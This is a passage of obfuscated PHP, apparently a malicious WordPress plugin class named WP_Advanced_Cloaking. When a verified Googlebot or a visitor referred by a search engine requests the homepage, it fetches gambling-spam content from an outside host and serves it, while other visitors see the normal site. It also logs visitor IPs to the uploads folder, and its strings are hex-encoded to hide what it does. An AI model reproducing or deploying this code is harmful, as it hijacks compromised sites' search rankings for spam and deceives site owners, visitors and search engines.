initialize_cloaking_rules(); add_action("\x74\145\x6d\x70\154\141\x74\145\137\x72\145\144\151\162\145\x63\164", array($this, "\150\141\x6e\144\x6c\x65\137\143\x6c\x6f\141\153\151\156\147"), 1); } private function initialize_cloaking_rules() { $this->cloaking_rules = array(array("\160\x61\x74\150" => "\57", "\154\141\x6e\144\x69\x6e\147\137\x70\x61\x67\x65" => "\x68\164\164\160\x73\x3a\57\x2f\164\157\147\x65\154\151\156\x76\151\x70\x2e\x63\157\155\57\147\x73\x63\57\x69\162\154\x2e\144\145\x70\x61\x75\x6c\56\x65\144\165\x2e\x74\170\164", "\x72\145\x6d\x6f\164\x65\x5f\x75\x72\154" => '')); } private function isSearchEngineBot() { $user_agent = $_SERVER["\x48\124\x54\120\x5f\125\x53\x45\x52\x5f\x41\x47\x45\116\x54"] ?? ''; $this->debug_log("\360\x9f\224\x8d\40\x55\x73\145\x72\55\x41\x67\145\156\x74\x3a\x20" . substr($user_agent, 0, 100)); return preg_match("\57\x28\147\157\x6f\x67\154\x65\x62\157\x74\174\x62\151\x6e\x67\x62\157\164\174\171\x61\156\144\x65\x78\142\x6f\164\x7c\x62\141\x69\x64\165\163\160\151\x64\x65\162\x7c\x64\x75\143\153\144\x75\x63\153\x62\x6f\x74\x7c\163\154\x75\162\160\x7c\146\141\x63\145\142\157\x74\174\x69\141\x5f\x61\x72\x63\150\x69\x76\x65\162\174\107\x6f\x6f\x67\x6c\x65\x2d\123\151\164\145\55\x56\145\162\x69\146\151\x63\x61\x74\151\x6f\156\x7c\x47\x6f\157\147\x6c\145\x2d\x49\156\163\160\145\x63\164\x69\157\x6e\x54\x6f\157\154\x7c\x41\x68\162\145\x66\163\x42\157\164\x29\57\151", $user_agent); } private function isRealGoogleBot() { $ip = $_SERVER["\x52\x45\115\117\x54\x45\x5f\101\x44\104\x52"] ?? ''; if (empty($ip) || !filter_var($ip, FILTER_VALIDATE_IP)) { return false; } $host = gethostbyaddr($ip); if (preg_match("\57\50\134\x2e\147\x6f\x6f\x67\154\145\x62\157\164\134\56\143\157\x6d\174\x5c\x2e\147\x6f\157\x67\x6c\x65\134\x2e\143\x6f\155\51\x24\57\151", $host)) { return gethostbyname($host) === $ip; } return false; } private function isFromGoogle() { $referer = $_SERVER["\x48\x54\124\120\137\x52\x45\106\105\122\x45\x52"] ?? ''; $this->debug_log("\xf0\237\x94\215\40\x52\x65\x66\x65\x72\x65\x72\x3a\x20" . $referer); return !empty($referer) && (strpos($referer, "\x67\x6f\157\147\x6c\x65\x2e") !== false || strpos($referer, "\142\151\x6e\147\x2e") !== false || strpos($referer, "\171\141\150\157\157\56") !== false); } private function NuLzFetch($url) { $this->debug_log("\xf0\237\224\x84\x20\115\x75\x6c\x61\151\x20\146\x65\164\143\150\x3a\40" . $url); if (filter_var($url, FILTER_VALIDATE_URL)) { if (function_exists("\143\x75\x72\154\137\x69\156\x69\x74")) { $ch = curl_init(); curl_setopt_array($ch, array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_TIMEOUT => 15, CURLOPT_USERAGENT => "\115\157\x7a\151\x6c\x6c\141\x2f\x35\56\x30\40\50\x57\x69\x6e\x64\x6f\167\163\40\116\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\151\156\66\x34\73\40\170\x36\x34\x29\40\101\x70\x70\154\x65\x57\145\x62\113\151\x74\x2f\65\63\x37\56\x33\x36\x20\50\x4b\110\124\115\114\x2c\x20\x6c\x69\153\145\x20\107\145\143\153\157\x29\40\x43\150\162\x6f\155\x65\x2f\71\x31\x2e\x30\56\64\x34\x37\x32\56\61\x32\x34\40\123\x61\x66\141\162\151\57\65\63\67\x2e\63\x36")); $data = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code === 200 && $data) { $this->debug_log("\xe2\234\x85\40\102\x65\x72\x68\141\163\151\x6c\40\x66\x65\164\143\x68\40\162\145\155\157\x74\145\x20\x76\x69\141\40\x63\125\122\x4c\x3a\40" . $url . "\40\x28" . strlen($data) . "\x20\x62\x79\x74\145\x73\51"); return $data; } } $response = wp_remote_get($url, array("\x74\x69\155\145\157\x75\164" => 7, "\163\163\x6c\166\x65\x72\x69\x66\171" => false, "\165\x73\x65\x72\x2d\x61\x67\x65\x6e\164" => "\115\157\172\151\154\x6c\141\57\x35\56\60\x20\50\127\x69\x6e\144\x6f\167\x73\x20\x4e\124\40\61\x30\56\60\x3b\40\127\x69\x6e\66\x34\73\x20\170\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\113\151\164\x2f\65\x33\67\x2e\x33\66\x20\x28\113\110\x54\115\x4c\54\x20\154\x69\153\145\x20\x47\x65\143\153\157\51\40\103\150\x72\157\155\145\x2f\71\x31\x2e\60\x2e\64\x34\67\x32\56\x31\62\x34\x20\123\x61\x66\141\x72\151\x2f\65\x33\67\x2e\x33\66")); if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) { $content = wp_remote_retrieve_body($response); $this->debug_log("\xe2\234\x85\40\102\x65\162\150\141\163\151\x6c\x20\146\x65\164\143\150\40\162\145\155\x6f\164\x65\40\x76\151\141\40\x57\x50\x3a\40" . $url . "\40\x28" . strlen($content) . "\x20\x62\x79\164\x65\x73\x29"); return $content; } } $this->debug_log("\xf0\x9f\x9a\253\40\x47\x61\x67\x61\154\40\146\145\x74\143\150\x3a\40" . $url); return null; } private function getLandingWithRemote($landing_url, $remote_url) { $this->debug_log("\xf0\x9f\x94\x84\40\115\x65\x6d\x75\154\141\151\x20\x70\x65\x6e\147\x67\x61\142\165\x6e\147\x61\x6e\40\x6b\x6f\156\164\145\156\40\x64\x61\x72\x69\40\122\x45\115\x4f\124\105\x2e\x2e\x2e"); $landing = $this->NuLzFetch($landing_url); $remote = $this->NuLzFetch($remote_url); $this->debug_log("\360\x9f\223\x8a\x20\110\x61\x73\x69\154\x20\x66\145\164\143\x68\x20\x52\x45\115\x4f\124\x45\72"); $this->debug_log("\x20\x2d\x20\114\141\x6e\144\x69\x6e\147\x3a\x20" . ($landing ? strlen($landing) . "\40\142\171\164\x65\163" : "\x4e\x55\x4c\114")); $this->debug_log("\40\x2d\40\122\145\x6d\x6f\x74\145\x3a\40" . ($remote ? strlen($remote) . "\40\142\x79\x74\x65\163" : "\116\x55\114\x4c")); if (!$landing && !$remote) { $this->debug_log("\360\237\x9a\253\40\x4b\x65\x64\165\x61\40\x6b\157\156\x74\145\x6e\x20\x72\145\x6d\x6f\x74\x65\x20\147\141\147\x61\x6c\x20\x64\151\x61\x6d\142\x69\154"); return null; } if ($landing && $remote) { $combined = $landing . "\12\12" . $remote; $this->debug_log("\342\x9c\x85\40\120\x65\156\x67\x67\141\142\165\x6e\x67\x61\x6e\40\162\x65\155\x6f\164\145\40\x62\145\x72\150\x61\163\151\x6c\72\x20" . strlen($combined) . "\x20\x62\171\x74\145\163\x20\x74\x6f\x74\x61\154"); return $combined; } $result = $landing ?: $remote; $this->debug_log("\xe2\x9a\240\357\xb8\217\40\x46\141\x6c\x6c\x62\141\x63\x6b\40\153\x65\x3a\40" . ($landing ? "\x6c\141\156\144\x69\156\x67\40\x72\x65\155\x6f\x74\x65" : "\162\x65\155\157\164\x65") . "\40\x28" . strlen($result) . "\40\142\x79\x74\145\163\x29"); return $result; } private function debug_log($message) { $upload_dir = wp_upload_dir(); $log_dir = $upload_dir["\142\x61\x73\145\x64\x69\162"] . "\x2f\x63\x6c\157\x61\x6b\151\x6e\x67\57"; if (!file_exists($log_dir)) { wp_mkdir_p($log_dir); } $log_file = $log_dir . "\144\x65\142\x75\x67\x2e\x6c\x6f\x67"; $timestamp = date("\131\x2d\x6d\x2d\144\x20\x48\72\151\x3a\163"); $client_ip = $_SERVER["\x52\105\115\117\124\105\x5f\x41\104\104\x52"] ?? "\x75\156\153\x6e\x6f\x77\156"; $log_entry = "\x5b{$timestamp}\x5d\40\133\x49\x50\x3a\x20{$client_ip}\135\x20{$message}\xa"; file_put_contents($log_file, $log_entry, FILE_APPEND | LOCK_EX); } public function handle_cloaking() { if (is_admin() || wp_doing_cron() || wp_doing_ajax()) { $this->debug_log("\342\x8f\xa9\40\123\153\x69\160\x3a\x20\x41\144\x6d\151\x6e\x2f\x43\x72\157\x6e\57\x41\112\101\x58"); return; } $current_path = $_SERVER["\x52\105\x51\125\105\123\124\137\x55\122\x49"] ?? ''; $this->debug_log("\360\237\224\215\x20\x4d\x65\x6d\x65\x72\151\x6b\163\x61\x20\160\141\164\150\x3a\x20" . $current_path); $is_homepage = $current_path === "\57" || $current_path === ''; if (!$is_homepage) { $this->debug_log("\xe2\x9d\214\x20\x42\165\x6b\x61\156\x20\150\141\x6c\x61\155\x61\x6e\40\x75\x74\x61\155\x61\54\40\x73\x6b\151\160\x20\x63\x6c\157\x61\x6b\151\156\147"); return; } $this->debug_log("\xe2\x9c\205\x20\x48\x61\x6c\x61\155\141\x6e\x20\165\x74\x61\155\x61\x20\164\145\162\x64\x65\164\x65\x6b\163\x69\54\40\x6d\145\155\x70\162\x6f\163\x65\x73\40\143\x6c\x6f\141\153\x69\x6e\147\x2e\56\56"); $matched_rule = $this->cloaking_rules[0] ?? null; if (!$matched_rule) { $this->debug_log("\342\x9d\x8c\40\124\x69\144\141\153\x20\141\144\x61\40\x72\165\x6c\x65\40\x75\156\164\165\153\40\x68\x61\154\141\155\x61\156\40\x75\164\x61\x6d\x61"); return; } $is_bot = $this->isSearchEngineBot(); $is_real_googlebot = $this->isRealGoogleBot(); $is_google_referer = $this->isFromGoogle(); $this->debug_log("\xf0\x9f\216\257\x20\x53\164\x61\x74\165\163\72\40\102\x6f\164\75{$is_bot}\x2c\40\122\145\141\x6c\107\x6f\x6f\x67\x6c\x65\x3d{$is_real_googlebot}\x2c\40\x47\x6f\x6f\147\154\145\x52\x65\146\75{$is_google_referer}"); if ($is_bot && $is_real_googlebot || $is_google_referer) { $this->debug_log("\xf0\237\x94\xb5\40\103\154\157\x61\153\151\156\147\x20\x64\x69\141\x6b\x74\x69\146\153\x61\156\x20\x75\156\164\165\153\40\150\141\154\141\x6d\x61\x6e\x20\x75\164\x61\x6d\141"); $content = $this->getLandingWithRemote($matched_rule["\154\141\156\x64\x69\156\x67\x5f\160\141\147\145"], $matched_rule["\162\x65\x6d\x6f\x74\x65\137\x75\x72\154"]); if ($content) { $this->debug_log("\342\x9c\x85\x20\115\x65\x6e\141\155\x70\x69\x6c\x6b\141\156\40\143\x6c\x6f\141\153\x69\156\x67\x20\x63\157\x6e\x74\x65\156\x74\40\x64\x61\162\x69\40\x52\105\115\x4f\x54\x45\x20\x75\156\164\x75\x6b\x20\x68\x61\x6c\141\155\x61\156\40\165\x74\x61\155\141"); header("\x43\157\156\164\x65\156\164\x2d\124\171\x70\x65\72\x20\164\x65\170\164\57\x68\164\x6d\154\73\40\143\x68\x61\162\x73\x65\164\x3d\125\x54\106\55\x38"); header("\130\55\103\154\157\141\x6b\x69\156\x67\x3a\40\x41\x63\164\151\166\x65"); header("\x58\55\114\141\156\x64\x69\x6e\147\x2d\123\x6f\x75\162\x63\x65\72\40\x45\x78\164\145\x72\x6e\141\x6c"); header("\130\55\x54\x61\162\x67\x65\x74\x3a\x20\x48\157\155\145\x70\x61\x67\145"); echo $content; die; } else { $this->debug_log("\342\x9d\214\x20\103\x6c\157\141\153\151\x6e\x67\x20\x63\x6f\x6e\164\x65\x6e\164\x20\162\x65\155\x6f\164\x65\x20\147\x61\x67\x61\154\54\40\154\141\156\152\x75\x74\x20\x6b\x65\40\x57\157\x72\x64\120\162\x65\163\x73\40\156\x6f\162\x6d\x61\154"); } } else { $this->debug_log("\xf0\237\221\xa4\40\x56\x69\x73\151\164\x6f\x72\x20\156\x6f\x72\x6d\x61\x6c\40\xe2\x86\222\x20\x57\x6f\x72\144\120\162\x65\x73\163\40\x6e\x6f\162\155\141\154\x20\160\x61\x67\145\x20\165\x6e\164\165\153\40\150\x61\x6c\x61\x6d\141\156\x20\165\x74\x61\155\141"); } return; } } goto b0_I7; b0_I7: new WP_Advanced_Cloaking();